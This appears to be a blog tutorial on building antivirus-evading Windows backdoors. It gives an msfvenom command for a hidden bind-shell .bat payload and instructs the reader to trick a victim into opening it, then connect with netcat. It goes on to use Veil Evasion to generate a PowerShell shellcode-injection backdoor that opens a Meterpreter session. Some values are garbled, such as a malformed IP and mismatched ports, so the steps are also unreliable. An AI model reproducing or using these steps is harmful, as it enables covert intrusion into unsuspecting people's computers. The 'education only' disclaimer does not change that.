Hack Windows FUD Anti VIrus


FUD In Wikipedia : (usually shortened as "FUD") can stand for data that had been encrypted, making it appear to be random noise. It can also stand for software that cannot be detected by anti-viruses when a scan is performed.[1] The term is used in hacker circles to refer to something that appears to be clean to many anti-viruses, even though it is a hacking tool.

Tools
Kali Linux. Download in https://www.kali.org/

Lets Get Tutorial:
Open Terminal in Kali Linux
Type : msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.10211 lport=8888 -f psh-cmd > /root/Desktop/hack.bat
192.168.10.211 : Your Ip Address
8888 : Port that will you use
/root/Desktop/ : Location of payload .bat
hack.bat : Name of Payload

In Victim. 
trick the windows user to open the payload you created.
This Method FUD AV . in this tutorial im use Avast Antivirus

After Open hack.bat
type nc 192.168.10.14 8888
for Access a Dir Target

Next . We need Create a backdoor for acceess Victim Full Access.
In this tutorial im use Veil Evasion for Create backdoor.
Open New terminal for Open Veil Framework
Type list for see list atabase payload on Veil Evasion
Select Powershell/Shellcode_inject/downloadd_virtual
Type Number 25

Set Lhost 192.168.10.211
Lport : 444
And Gernerate
192.168.10.211 : Your Ip Address
4444 : Port that will you use

Payload File : Location of Payload
Handler File : Location Of handler

Handler file is you have access the msfconsole easily

In Location of handler 
Type msfconsole -r payload_handler.rc

Open FIle of Payload with Text Editor
Copy that



Paste in the first terminal.

The meterreter process will open in the second terminal


Watch in Too :
Tutorial Version Video


This Content Only For Education Purpose
Happy Learning

Subscribe to receive free email updates:

1 Response to "Hack Windows FUD Anti VIrus"